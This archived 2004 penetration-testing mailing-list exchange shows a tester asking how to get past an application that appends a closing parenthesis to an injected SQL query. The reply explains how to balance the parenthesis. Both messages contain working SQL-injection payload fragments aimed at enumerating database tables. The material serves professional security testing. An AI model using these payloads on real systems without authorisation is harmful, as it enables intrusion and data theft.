|
Penetration Testing
mailing list archives
Re: SQL-Injection escape ')'
From: Fabrice MARIE <fabrice.marie () fma-rms com>
Date: Mon, 5 Jul 2004 13:11:09 +0800
Hello,
On 03 July 2004 pm 22:45, Strcpy wrote:
Hi list .
I`m working on a web-application for vulnerability
assesments in order to complete a pen-test job.
there is a vulnerable query there but I can`t escape
it ad use it to go farther .
the page script add a ')' to end of query string
always.
I tried to pass it by useing # or -- or ')'=')' at the
end of my query strings , but non worked :/
here is an example :
i sent this :
A') select name from sysobjects where xtype='U'--
[Microsoft][ODBC Microsoft Access Driver] Syntax
error. in query expression 'city_name='Tehran' and
(agency_english ='A') select name from sysobjects
where xtype='U'--')'
would you mind please help me ?
try something like this:
select name from sysobjects where xtype='U' or (1=1
This way if the application adds a parenthesis, it's just going
to close the one you opened on purpose and the syntax should
remain correct in the end.
'or 1=1' doesn't affect your SELECT query, because it's always true..
Have a nice day,
Fabrice.
--
Fabrice A. MARIE
FMA Risk Management Solutions
http://www.fma-rms.com/
 By Date 
By Thread
Current thread:
| 
Intro
